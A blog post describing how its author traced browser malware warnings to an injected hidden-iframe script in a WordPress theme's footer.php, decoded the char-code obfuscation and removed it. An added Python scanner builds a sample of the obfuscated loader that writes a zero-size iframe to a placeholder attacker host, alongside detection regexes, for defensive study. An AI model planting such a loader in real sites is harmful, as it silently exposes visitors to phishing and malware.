A few months ago, I got an email from a family member telling me that when they visited my blog, they received a “malicious software” warning. I found this very odd, since I visit my own blog fairly regularly and hadn’t noticed anything out of the ordinary. It turned out that the issue only appeared in Safari on the Mac. The thing is, I rarely use Safari on my Mac, since my default cross-platform browser is Firefox. So I fired up Safari, and sure enough, I was greeted with the following warning:
My website contains “malware” or “malicious software”??? HUH?!! WHAT!!! The whole idea of my blog is to HELP people get out of computer trouble, not cause it. So, of course, I panicked. Clicking through the only link on the warning page (which pointed at “ssl-google-analytics.com”) gave me the following information:
I found this very odd since, while I was indeed running Google Analytics code, the domain showing in the warning looked a bit strange. So I followed the link at the bottom and requested a review of my site using Google Webmaster Tools. Note that the site flagged in the warning (ssl-google-analytics.com) was not my domain. A site review can take several weeks, so I submitted the request and assumed that it had gone through and all had been taken care of.
Also note that if you try to visit http://ssl-google-analytics.com (DON’T CLICK THIS LINK UNLESS YOU HAVE ANTI-VIRUS, ANTI-PHISHING OR MALWARE PROTECTION), it has already been flagged as a malicious site by some providers, anti-virus software and browsers, so you should be OK, but just in case, I wouldn’t click through to it. It is made to look like the Google Analytics site, so be careful.
This is a side-by-side of the REAL Google Analytics site (http://www.google.com/analytics/) on the top and the phishing site on the bottom, as viewed in Internet Explorer 7. Note the copyright dates are off (attention to detail, hackers!).
If you visited the site in Firefox 3, you got the following warning (note: there was NO WARNING in IE7):
Last night, however, I found that my blog was still producing warnings. This was concerning, as a few people had reported it. Also, when my wife went to my blog, she was blocked by Kaspersky Internet Security with the following error:
I just didn’t get it. There was some sort of “infection” happening. But how do you figure out what is infected on a website if you don’t have full access to the machine it is hosted on?
How to Detect
I decided to really start digging and tried to think back to whether I had installed any new plugins on my blog recently. I disabled a few, one by one, testing after each to see whether Kaspersky threw any more alerts. The process was long and tedious and didn’t turn up anything.
So then I decided to try activating different themes to see if perhaps a theme was infected. When I switched to the WordPress default theme, NO alert was thrown. Now I was getting somewhere: something within my theme was infected. How to test that? On a whim, I decided to do a full download of all of my blog’s files and run a virus scan on them locally.
BINGO! Kaspersky found that my theme’s “footer.php” file was infected with “HEUR:Trojan.Script.Iframer”. (Despite what I found on the Kaspersky forum, this was a real threat and not a “false positive” as a few of the forum posts suggested.) Kaspersky has a solid Anti-Virus and Internet Security program, but you can also try AVG, which has a free version that may work as well. Other anti-virus software may also detect malicious code within PHP files. I know for a fact that Kaspersky was able to detect and remove the infection in the PHP file as well as block the infected site.
I started looking at the code a bit more (again, I have never taken any programming, so I was guessing a bit here) and saw the reference to the number “3” within the code. I also started thinking about the site that was showing up as malware (“ssl-google-analytics.com”). I decided to plug that bad URL into Uncle Jim’s Utility, which turns text into character codes. The output was interesting: “115, 115, 108, 45, 103, 111, 111, 103, 108, 101, 45, 97, 110, 97, 108, 121, 116, 105, 99, 115, 46, 99, 111, 109, 47”. I looked for the repetition of “115, 115” in the original block above and found it, along with the rest of the numbers. Numbers that were only two digits had been padded with a leading “0”, so “45” became “045”. That is where the “3” came into play: each group of 3 digits represented one character.
I took the original block of numbers and manually added a comma after every third digit so that I had groups of 3. I then plugged that long list into Uncle Jim’s CharCode Translator and got back the hacker’s code that was causing all of my issues. Note, I won’t show the resulting code in this post. If you want to try it, you can do it yourself, but it basically wrote a 0-pixel by 0-pixel hidden iframe that loaded the “ssl-google-analytics.com” URL.
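The hand decoding above, and the scan of the downloaded files before it, can be scripted. The following Python is an added example written for this page, not code from the post. The footer.php content it scans is a constructed sample that reproduces the pattern described (a packed string of zero-padded three-digit character codes, rebuilt by a small loader with String.fromCharCode and written out as a zero-sized iframe); it is not the real payload, and attacker.example stands in for the real domain. The only data taken from the post is the comma-separated code list, which the script decodes to confirm it spells out the domain.

```python
import re
from typing import List


def encode_packed3(text: str) -> str:
    """Encode text the way the injected script did: each character as a
    zero-padded three-digit decimal code, concatenated with no separators."""
    return "".join(f"{ord(c):03d}" for c in text)


def decode_packed3(digits: str) -> str:
    """Reverse of encode_packed3: split into groups of 3 and map each to a char."""
    if not digits or len(digits) % 3:
        raise ValueError("digit run length is not a multiple of 3")
    return "".join(chr(int(digits[i:i + 3])) for i in range(0, len(digits), 3))


def decode_codes(codes: str) -> str:
    """Decode a comma/space-separated list of decimal char codes (the form the
    CharCode Translator works with)."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", codes))


# Constructed sample (NOT the real payload from the post): a WordPress footer.php
# with an injected loader that rebuilds HTML from a packed digit string.
# attacker.example is a placeholder domain.
HIDDEN_IFRAME = '<iframe src="http://attacker.example/" width="0" height="0"></iframe>'

SAMPLE_FOOTER_PHP = (
    "<?php wp_footer(); ?>\n"
    "</div>\n"
    '<script type="text/javascript">var s="' + encode_packed3(HIDDEN_IFRAME) + '";'
    'var o="";for(var i=0;i<s.length;i+=3){o+=String.fromCharCode(parseInt(s.substr(i,3),10));}'
    "document.write(o);</script>\n"
    "</body></html>\n"
)

# The list the post got by feeding the bad URL to the charcode utility.
POST_CODES = ("115, 115, 108, 45, 103, 111, 111, 103, 108, 101, 45, 97, 110, 97, "
              "108, 121, 116, 105, 99, 115, 46, 99, 111, 109, 47")

DIGIT_RUN = re.compile(r"\d{30,}")  # honest theme code rarely has 30+ digits in a row
LOADER = re.compile(r"String\.fromCharCode|\beval\s*\(|unescape\s*\(|document\.write\s*\(")
ZERO_SIZE = re.compile(r'\b(width|height)\s*=\s*["\']?0["\']?', re.I)


def scan_source(src: str) -> List[dict]:
    """Find packed char-code payloads in a theme file and decode them for review.
    Returns one finding per decodable run; 'kind' is 'hidden_iframe' when the
    decoded text is a zero-sized iframe like the one described in the post."""
    findings = []
    for m in DIGIT_RUN.finditer(src):
        run = m.group(0)
        try:
            decoded = decode_packed3(run)
        except ValueError:
            continue
        # A real payload decodes to printable ASCII; anything else is noise.
        if not all(32 <= ord(c) < 127 for c in decoded):
            continue
        is_iframe = "<iframe" in decoded.lower() and bool(ZERO_SIZE.search(decoded))
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "kind": "hidden_iframe" if is_iframe else "other",
            "loader_nearby": bool(LOADER.search(src)),
        })
    return findings


def scan_files(paths: List[str]) -> List[dict]:
    """Run scan_source over downloaded theme/plugin files (e.g. wp-content/**/*.php)."""
    results = []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_source(fh.read()):
                f["file"] = path
                results.append(f)
    return results


if __name__ == "__main__":
    print(decode_codes(POST_CODES))  # the domain hidden in the digit block
    for f in scan_source(SAMPLE_FOOTER_PHP):
        print(f["kind"], "at offset", f["offset"], "->", f["decoded"])
```

Point scan_files at the PHP files from your full site download. The 30-digit threshold and the loader regex are heuristics: a clean theme can trip them (a long license key, a legitimate document.write), so read the decoded text before deleting anything, and treat a decodable run that sits next to a String.fromCharCode loader as the strong signal.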
The Cure & Prevention
As I mentioned before, once the file containing the malicious code is identified, it is very easy to correct: simply remove the injected script. It’s that easy. Keep in mind, though, that this only removes the payload. I’m not entirely sure how the code got there, nor how to completely prevent it from happening again, so it is worth re-downloading and re-scanning the site afterwards and keeping WordPress, the theme and all plugins up to date. I do believe that it has to do with “Code Injection” (which you can read about at length on Wikipedia). I have also come across a “firewall plugin” that is supposed to prevent code injection (complete with email alerts). It’s called WordPress Firewall and is written by SEO Eggheads. I honestly don’t know if this plugin really does its job or not, but I have definitely seen some alerts. Also, when I was activating and deactivating my themes to test, I got alerts when my infected theme was activated.
Don’t ignore any reports from your users of odd behavior on your site. Take some time to check it out, and don’t install any plugins that seem a bit odd or come from untrusted third-party sites.
HTD Says: Keep your blogs safe. A bit of prevention will do you and your users some good!